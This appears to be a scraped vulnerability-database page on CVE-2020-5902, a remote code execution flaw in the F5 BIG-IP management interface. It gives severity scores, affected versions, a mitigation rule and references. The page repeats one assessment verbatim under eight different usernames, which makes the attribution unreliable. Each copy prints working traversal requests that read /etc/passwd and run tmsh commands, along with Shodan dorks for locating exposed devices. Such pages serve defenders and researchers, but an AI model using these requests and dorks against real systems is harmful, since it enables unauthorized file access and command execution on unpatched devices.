AttackerKBAKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1CVE-2020-5902 β TMUI RCE vulnerability
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Recent assessments:
Mad-robot at July 05, 2020 1:21pm UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
kevthehermit at July 03, 2020 5:30pm UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
ccondon-r7 at July 04, 2020 10:41pm UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
busterb at July 06, 2020 2:29am UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
0xturazzi at July 10, 2020 1:59pm UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
gwillcox-r7 at October 20, 2020 5:49pm UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
wvu-r7 at September 03, 2020 5:15pm UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
miteshkwan1 at July 17, 2020 1:32pm UTC reported:
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
Versions Effected
-
BIG-IP 15.x: 15.1.0/15.0.0
-
BIG-IP 14.x: 14.1.0 ~ 14.1.2
-
BIG-IP 13.x: 13.1.0 ~ 13.1.3
-
BIG-IP 12.x: 12.1.0 ~ 12.1.5
-
BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+"3992">
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
References
packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html
blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
github.com/corelight/CVE-2020-5902-F5BigIP
github.com/rapid7/metasploit-framework/pull/13807
otx.alienvault.com/pulse/5f282c78953c1baee1f9b01b
research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence
support.f5.com/csp/article/K52145254
us-cert.cisa.gov/ncas/alerts/aa20-206a
us-cert.cisa.gov/ncas/alerts/aa20-259a
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%